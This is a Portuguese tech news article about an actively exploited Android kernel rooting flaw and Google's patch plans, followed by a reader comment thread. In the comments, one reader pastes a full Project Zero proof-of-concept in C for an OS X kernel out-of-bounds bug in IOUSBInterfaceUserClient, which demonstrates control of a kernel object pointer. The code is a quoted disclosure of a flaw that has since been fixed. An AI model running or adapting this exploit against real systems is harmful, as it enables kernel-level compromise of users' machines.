Cuidado, há uma nova falha grave no Android!
O rooting explora as fragilidades que são descobertas no Android ao desbloquear os sistemas e dar aos utilizadores acesso pleno, sem os normais controlos. Por norma isto é feito de forma consciente e controlada, sendo realizado pelos utilizadores.
Mas a Google veio agora alertar para uma nova falha que foi descoberta e que permite a uma simples aplicação alterar o Android de forma permanente, nem sempre com as melhores intenções.
Esta falha do Android foi descoberta pela C0RE Team e pela Zimperium, a mesma que antes já tinha trazido ao mundo o Stagefright.
É um problema que começou por afectar o mundo Linux e que a Google entendeu que não afectava o seu sistema operativo. Mas a verdade é que este problema pode mesmo ser explorado no Android e na verdade está já a ser.
Este bug tem está presente no Kernel do Android, que é partilhado com o Linux e permite que possam ser contornadas as regras de segurança do Android, de forma permanente e expor o smartphone.
A reacção da Google
A Google está a tomar este problema de forma muito séria. Para além do alerta de segurança emitido, a empresa está já a trabalhar de perto com a comunidade que desenvolve o AOSP para que o problema seja sanado.
Além disto a Google prepara-se para lançar nos próximos dias uma actualização de segurança. Os parceiros OEM receberam também este patch de segurança para que os enviem para os seus equipamentos.
O maior problema é que a falha está já a ser explorada e existem já várias aplicações detectadas que a estão a usar. Neste caso limitam-se a fazer root aos Nexus 5 e 6, mas em breve poderá ser usada para outros fins, sem que os utilizadores tenham noção disso, comprometendo de imediato os terminais.
Que medidas estão a ser tomadas para proteger o Android?
A Google já retirou da Play Store esta aplicação, mas a mesma pode ser obtida facilmente noutras lojas de aplicações. Mesmo recorrendo à sua política de proibição de aplicações na Play Store, que permitam fazer Root e também à verificação activa de aplicações maliciosas, dificilmente a Google irá conseguir controlar este problema.
A solução deverá chegar dentro de dias nas actualizações de segurança mensais que a Google lança para os seus equipamentos Nexus e os restantes fabricantes devem seguir o mesmo caminho.
Mesmo assim, e graças à fragmentação do Android, muitos vão ser os equipamentos que não vão ter acesso a estas actualizações e que vão continuar expostos ao problema.
Este artigo tem mais de um ano
Bootloader locked e não tenho que me preocupar com essas coisas.
O pessoal faz root e unlock bootloader depois metem-se a jeito!
Exato. Enquanto isso no meu Windows 10 Mobile nem sequer um anti-virus preciso.
Hehehehe 😀
+1
+1
Tal como o Windows RT não precisava, aliás, nem o Android!
Mal começar a ter bastantes utilizadores verás…
lol, entao e quer quer apenas ter o bootloard unlock para usar custom roms, tem de ser crucificado?
percebo o que queres dizer, mas o teu comentário não faz sentido.
Sim e assim ficas la com outras apps de treta que nunca utilizas e nem podes desinstalar…
a não ser que o teu bootloader se refira a outra coisa qualquer, o Bootloader num Android não tem nada a ver com acesso root ao sistema operativo, por isso Bootloader locked não serve de nada para não ficares preocupado com estas coisas.
Tenta fazer root então num xiaomi com o bootloader locked e vais ter uma supresa!
o bootloader apenas te escolhe e arranca o sistema, não afecta como o sistema corre e as permissões de acesso dentro do sistema. Se isso te acontece não é por ter o bootloader em si bloqueado, mas por o processo usado para o unlock do bootloader ter desactivado primeiro uma outra medida de segurança que depois usaste para o root. Isto é ter o bootloder bloqueado em nada te garante que não haja outra via para acesso ao root.
Isso de bootloaders e etc é chinês para 99% das pessoas. Mas o Android é “melhor”
Qual o nome da aplicação retirada da loja pela Google?
A Google não refere.
Pesquisa no Google
Pq falam de coisas q ñ sabem ? Todos os Android q tive, tive sempre com ROOT e Bootloader Unlocked…problemas ?!?!? ZERO ! Existe um site / forum chamado XDA, site esse q tem pessoas q ajudam a “libertar” o sistema Android e para ajudar todos aqueles q tenham dúvidas ! Basta ler e estudar os tópicos referentes aos modelos q têm.
Para mim o melhor site / forum sobre Android.
o problema está nisto ser uma vulnerabilidade que pode ser aproveitada por qualquer aplicação para ter acesso Root, sem saberes.
Dava jeito saber qual é o nome da aplicação…
A falha é nova, ou foi descoberta agora?
lol o “android do chines”? por exemplo? “Mesmo assim, e graças à fragmentação do Android, muitos vão ser os equipamentos que não vão ter acesso a estas actualizações e que vão continuar expostos ao problema.”
O Android é mais falhas! Essa é que é a verdade…
“Por norma isto é feito de forma consciente e controlada, sendo realizado pelos utilizadores.” Oi?
Desde quando? Os utilizadores dizem amén a tudo. A app da flashlight acede aos contactos e dizem que sim. Algo feito de forma consciente e controlada? isso existe? onde raio foram buscar esta opinião?
desde que é preciso saber o que se está a fazer para fazer root a um telemóvel
Vou já tirar um curso para prender a fazer root ao telemóvel.
😉
Acredita que muita gente precisa… Não é assim tão fácil para quem é mais “iletrado” em tecnologia
Na verdade até precisas e não é fácil. A única razão pela qual não o fizeste é porque há gente que o fez por ti, teve o trabalho e teve a gentileza de o publicar de forma extremamente simplificada para asnos como nós o conseguirmos reproduzir sem ter que perceber muito do assunto. Ou achas que as coisas caem do céu?
Não fazes root ao teu telemóvel por acidente, e quando eles se referem a uma forma consciente e controlada é quando o fazes para obter um fim específico. Quando é explorado maliciosamente é quando deixou de ser consciente e controlado.
Agora ao que tu provavelmente te queres referir é às consequências de o fazer. Se vais por aí, é responsabilidade tua saberes ao que estás sujeito e o que pode advir disso, positivo e negativo.
looooool mesmo
Só mais uma….todos os dias sai uma nova…qual a novidade…bah
mais uma…. android nunca mais, so me deu problemas.
Qual o SO que usas? Diz-me um que não tenha problemas que eu mudo ja 🙂
zx spectrum
Que problemas? Foste hackado foi? É que aparentemente este tipo de coisas só afectam quem é burro ou quem se mete a fazer o que não deve.
Chamados problemas de utilizador lol
Eu nunca tive problemas “maiores” com o android.
Nao se te referes a iOS, mas se sim aqui vai uma lista de problemas, referencias no pplware 😉
1) https://pplware.sapo.pt/informacao/falha-de-seguranca-https-afecta-milhoes-de-utilizadores-ios/
2) https://pplware.sapo.pt/informacao/apps-ios-que-usam-browser-tem-grave-problema-de-seguranca/
3) https://pplware.sapo.pt/apple/apple-ainda-nao-actualizou-falha-de-seguranca-do-gatekeeper/
4) https://pplware.sapo.pt/smartphones-tablets/ios/iphone-tem-uma-falha-que-permite-instalacao-de-apps-maliciosas/
5) https://pplware.sapo.pt/software/mac-os-e-ios-considerados-os-sistemas-mais-inseguros-em-2015/
6) …. a lista podia continuar 🙂
So para dizer que: problemas todos os SO tem. Uns mais que outros.
+1
E digo mais,
Quanto mais seguro for o SO, mais vulnerável é o utilizador 🙂
Frases feitas que tiraste do rabo.
Se é mentira estás à vontade para argumentar.
E sim, sempre rabo, quando se tratam de progenitoras de frequentadores do pplware não corro riscos 🙂 boa Páscoa pra ti tmb, e dá-te um pouco mais ao respeito que não te fica nada mal.
+1
Mas isso é só no pplaware, porque na realidade, o Android é um poço de malware, já no iOS, na prática, nada!
Na tua realidade talvez.
Contra argumentos desses nem vale a pena dar bola.
Tens uma maça no sitio do coração e basta 😛
A diferença é que 90% ou mais dessas falhas que apontas já foram corrigidas e a esmagador maioria dos idevices têm acesso essas correções . no android a correção as falhas que vão aparecendo só ficam disponível para “meia dúzia” de dispositivos! é essa a grande diferença! Enquanto no IOS as falhas vão sendo corrigidas e disponibilizadas a quase todos mal estejam disponíveis no android rezem que os vossa dispositivos tenham acesso as correções! Abraço
se a correcção for lançada pela google qualquer aparelho pode ter acesso! a apple tb não actualiza todos os idevices, kem tem os mais antigos fica a chuchar no dedo!
A correcção está disponível para aparelhos a partir de 2011, cerca de 97% de todos os aparelhos ainda em uso com iOS. Qual será a percentagem de Nexus em uso que podem ter correcção?
Não há SO sem problemas, há SO que não foram explorados o suficiente.
Antigamente o Windows era um cancro, agora o Android, baseado em linux é uma besta..
Só a Apple é que é boa… cof cof.. Se fosse o SO mais usado, era logo encontrado uns quantos..
Exactamente.
E vamos lá fazer a analogia dos automoveis:
Porque não andamos todos de mercedes? É bom…venha quem vier.
Essa coisa do ser melhor só é usado pra não ficarem com penas dos € investidos em telefones.
Pk quem realmente quer e pode ter um topo de gama compra e nem tem qu justificar nada 🙂
WP, e mais nada.
Boas noticias mas só deveremos receber a atualizacao daqui a 1 ano
Ainda a espera do marshmellow para o galaxy s6 🙁
Oh Jorge, o autor do artigo foi claro nesse aspeto:
“Os parceiros OEM receberam também este patch de segurança para que os enviem para os seus equipamentos.”
Resta-te aqui 2 coisas:
Ou compras nexus e tens updates durante anos
ou compras um equipamento que te permita alterar rom, para quando a tua “marca” deixe de lançar updates.
Recebi o marshmallow hoje no meu S6 Edge + 🙂
Mas deve ter atualizações de segurança mensais.
Apenas uma das “leis” de segurança informática: mais vale ter um sistema que quando se encontra uma falha, todos sabem e podem se proteger, que um sistema fechado que também tem falhas, mas só o cracker sabe.
informação de falhas não tem nada a ver com ser ou não Open Source, tem a ver com a pessoa que a descobre comunicar.
uma parte do android é open source, outra parte tem codigo da google. o facto de uma parte ser open source favorece que sejam descobertas mais falhas e vulnerabilidades tornando o sistema mais seguro. testes recentes mostram que o android é mais seguro que ios.
Esta falha no kernel Linux já foi descoberta há mais de 2 anos e só agora é que no Android decidiram corrigir. Não parece que tenha favorecido muito.
Que testes recentes são esses?
Poderá ser mais seguro, mas aqui lá está.. depende sempre do utilizador.
Eu tendo mais liberdade num S.O. controlo melhor a minha segurança, lógico que nada é anti bala, mas é possivel ter-se segurança
O problema disto é que vai ser mais uma vez que só as versões de android de 5 para cima é que vão receber as tais atualizações a corrigir isto. Quem tem para baixo fica na mesma.
Falhas? Alguém que me traduza isso porque eu com o meu W10M nao percebo grande coisas de falhas
Não cantes muito de galo, que se ainda não tem falhas, é apenas uma questão de tempo até ter. É assim com todos os SOs
Para já ainda tou a procura deles, agora no caso dos androids… Tens android? Quantas vezes ja reiniciaste hj? 2? 3? Pois…
Reiniciar pk? É hábito?
pois, com a quantidade de coisas e apps que existem pra esse tijolo a que chamas de telemóvel, realmente é difícil haver falhas!
O meu Nexus 6P parece-me ter sido uma boa compra.
Só vejo um motivo para os utilizadores de IOS virem, todos chateados, comentar esta notícia que até foi notificada pela própria Google. O motivo é estarem entalados com um equipamento que não vale o preço. Não vejo outra razão. É que nem sequer são coerentes nem realistas nas críticas. E o pior é que não pesquisam antes de comentar seja o que for. Em relação a notícia tenho um equipamento da Apple e outro da Google (nexus) e até acho (parece-me a mim) que os equipamentos nexus recebem as correcções mais rapidamente do que o IOS (no meu caso um ipad)
Precisa PoC
Informação inútil !!
olha uma vulnerabilidae em iOS
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=728
External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.
It takes two scalar inputs and uses the second one as an array index to read a pointer
to a C++ object without checking the bounds then calls a virtual method on it.
Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
index the array this means we can easily get the kernel to dereference a controllable
userspace address.
In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.
tested on MacBookAir5,2 w/10.11.3 (15D21)
*/
// ianbeer
// build: clang -o usb_oob usb_oob.c -framework IOKit
// tested on MacBookAir5,2 w/10.11.3 (15D21)
/*
OS X Kernel code execution due to lack of bounds checking in AppleUSBPipe::Abort
External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.
It takes two scalar inputs and uses the second one as an array index to read a pointer
to a C++ object without checking the bounds then calls a virtual method on it.
Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
index the array this means we can easily get the kernel to dereference a controllable
userspace address.
In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.
*/
#include
#include
#include
#include
#include
#include
#include
#include
void map_payload(uint64_t target_rip) {
uint64_t*** obj_ptr_ptr = (void*)0x0000000787878780;
void* request = (void*)0x0000000787878000;
void* page = mmap(request, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
if (request != page) {
printf(“MAP_FIXED didn’t give us the right page\n”);
exit(EXIT_FAILURE);
}
memset((void*)page, ‘A’, 0x1000);
}
uint64_t make_call(mach_port_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputScalarCnt = 2;
inputScalar[0] = 0;
inputScalar[1] = 0xf0f0f0f0;
err = IOConnectCallMethod(
conn,
36,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf(“IOConnectCall error: %x\n”, err);
} else{
printf(“worked?\n”);
}
return 0;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf(“unable to create service matching dictionary\n”);
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf(“no matches\n”);
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf(“unable to find service\n”);
return 0;
}
printf(“got service: %x\n”, service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf(“unable to get user client connection\n”);
return 0;
}
printf(“got userclient connection: %x\n”, conn);
return conn;
}
int main(int argc, char** argv){
mach_port_t port = get_user_client(“IOUSBInterface”, 0x0);
map_payload(0xffff414141414141);
make_call(port);
return 0;
}
é uma vulnerabilidade no OS X e que foi corrigida.
Bastava a google bloquear a instalação de apks externos via file explorers e afins.
Os utilizadores ficavam mais limitados como os do iOS e os devs eram os únicos com conhecimentos suficientes pra proceder à instalação das suas apps pra testes e debugging.
“Se um hacker tiver acesso fisico ao teu dispositivo,
ele deixa de ser teu!”
–Mitnick
Agora so precisas saber quem é o hacker, eu sei que eu o sou nos meus dispositivos.